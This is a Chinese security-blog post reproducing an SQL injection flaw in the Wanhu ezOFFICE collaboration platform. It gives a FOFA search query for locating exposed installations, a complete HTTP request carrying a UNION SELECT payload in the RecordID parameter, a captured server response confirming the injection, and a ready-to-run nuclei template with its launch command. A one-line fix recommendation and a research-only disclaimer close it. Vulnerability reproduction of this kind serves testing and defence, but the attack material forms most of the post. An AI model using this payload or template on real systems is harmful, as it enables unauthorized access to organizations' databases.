万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入漏洞复现 nuclei poc

admin
admin
admin
138315
文章
113
评论
2023年11月24日11:25:58评论31 views字数 4410阅读14分42秒阅读模式


使



01

漏洞名称



万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入漏洞


02


漏洞影响


万户ezOFFICE协同管理平台

万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入漏洞复现 nuclei poc



03


漏洞描述


万户ezOFFICE协同管理平台是一个综合信息基础应用平台。 万户ezOFFICE协同管理平台存在SQL注入漏洞,攻击者可利用该漏洞获取数据库相关信息以及数据库权限。


04


FOFA搜索语句

app="万户ezOFFICE协同管理平台"

万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入漏洞复现 nuclei poc



05


漏洞复现


POC数据包如下,计算102103122的MD5

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36Connection: closeAccept: */*Accept-Language: enAccept-Encoding: gzip

响应内容比较长只粘贴了部分

HTTP/1.1 200 OKConnection: closeTransfer-Encoding: chunkedContent-Type: text/html;charset=UTF-8Date: Thu, 23 Nov 2023 02:16:56 GMTServer: nginxSet-Cookie: OASESSIONID=98XJAJF37E97F3FA265C53277LDJ2B; Path=/
<html><head><title>模板管理</title><link rel='stylesheet' type='text/css' href='../test.css'><script language="javascript" for=WebOffice event="OnMenuClick(vIndex,vCaption)">   if (vIndex==1){  //打开本地文件      WebOpenLocal();   }   if (vIndex==2){  //保存本地文件      WebSaveLocal();   }   if (vIndex==4){  //保存并退出     SaveDocument();    //保存正文     webform.submit();  //提交表单   }   if (vIndex==6){  //打印文档      WebOpenPrint();   }</script>
<script language=javascript>
//作用:显示操作状态function StatusMsg(mString){  StatusBar.innerText=mString;}
//作用:载入iWebOfficefunction Load(){  try{
  //以下属性必须设置,实始化iWebOffice  webform.WebOffice.WebUrl="http://X.X.X.X/defaultroot/iWebOfficeSign/OfficeServer.jsp";    //WebUrl:系统服务器路径,与服务器文件交互操作,如保存、打开文档,重要文件  webform.WebOffice.RecordID="0x6cfe798ba8e5b85feb50164c59f4bec9";   //RecordID:本文档记录编号  webform.WebOffice.Template="0x6cfe798ba8e5b85feb50164c59f4bec9";   //Template:模板编号  webform.WebOffice.FileName="null";   //FileName:文档名称  webform.WebOffice.FileType="null";   //FileType:文档类型  .doc  .xls  .wps  webform.WebOffice.EditType="1";   //EditType:编辑类型  方式一、方式二  <参考技术文档>  webform.WebOffice.UserName="dddddd";   //UserName:操作用户名
  //以下属性可以不要  webform.WebOffice.ShowMenu="1";  //ShowMenu:1 显示菜单  0 隐藏菜单  webform.WebOffice.AppendMenu("1","打开本地文件(&L)");  webform.WebOffice.AppendMenu("2","保存本地文件(&S)");  webform.WebOffice.AppendMenu("3","-");  webform.WebOffice.AppendMenu("4","保存并退出(&E)");  webform.WebOffice.AppendMenu("5","-");  webform.WebOffice.AppendMenu("6","打印文档(&P)");  webform.WebOffice.DisableMenu("宏;选项;帮助");  //禁止菜单
  webform.WebOffice.WebOpen();          //打开该文档    交互OfficeServer的OPTION="LOADTEMPLATE"
  //隐藏按钮  webform.WebOffice.VisibleTools("新建文件",false); //隐藏“新建文件”功能按钮  webform.WebOffice.VisibleTools("打开文件",false); //隐藏“打开文件”功能按钮  webform.WebOffice.VisibleTools("保存文件",false);  webform.WebOffice.VisibleTools("文字批注",false);  webform.WebOffice.VisibleTools("手写批注",false);  webform.WebOffice.VisibleTools("文档清稿",false);  webform.WebOffice.VisibleTools("重新批注",false);  webform.WebOffice.VisibleTools("全屏",false);
  StatusMsg(webform.WebOffice.Status);  }catch(e){}}

//显示上传function showUpload(picType){        document.all.selectPicTR.style.display="";        document.all.picType.value = picType;}
function hideUpload(){        document.all.selectPicTR.style.display="none";}
//作用:模板签章function setSignature(){  var picType = document.all.picType.value;  try{        //var path="C:\Documents and Settings\Samuel\My Documents\My Pictures\362.jpg";        var path=document.all.oFile1.value;        //alert(path);        var p1 = webform.WebOffice.WebObject.Application.Selection.InlineShapes.AddPicture(path,false,true);        var pp = p1.ConvertToShape();        //var pp = webform.WebOffice.WebObject.Shapes.AddPicture(path,false,true);        pp.AlternativeText = picType;    pp.ZOrder(5);  }catch(e){    alert(e.description);  }  hideUpload();}

响应数据包第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串就证明漏洞存在



06


nuclei poc


poc文件内容如下

id: wanhu-ezOFFICE-SendFileCheckTemplateEdit-sqliinfo:  name: 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入漏洞  author: fgz  severity: high  description: '万户ezOFFICE协同管理平台是一个综合信息基础应用平台。 万户ezOFFICE协同管理平台存在SQL注入漏洞,攻击者可利用该漏洞获取数据库相关信息以及数据库权限。'  metadata:    max-request: 3    fofa-query: app="万户ezOFFICE协同管理平台"    verified: true  tags: sqli,wanhu,2023
http:  - method: GET    path:      - "{{BaseURL}}/defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--"    matchers:      - type: dsl        dsl:          - "status_code == 200 && contains(body,'6cfe798ba8e5b85feb50164c59f4bec9')"

运行POC

nuclei.exe -t mypoc/万户/wanhu-ezOFFICE-SendFileCheckTemplateEdit-sqli.yaml -u  http://x.x.x.x

万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入漏洞复现 nuclei poc



07


修复建议


升级到最新版本,或者安装WAF进行防护。


原文始发于微信公众号(AI与网安):万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入漏洞复现 nuclei poc

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年11月24日11:25:58
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入漏洞复现 nuclei pochttps://cn-sec.com/archives/2234998.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息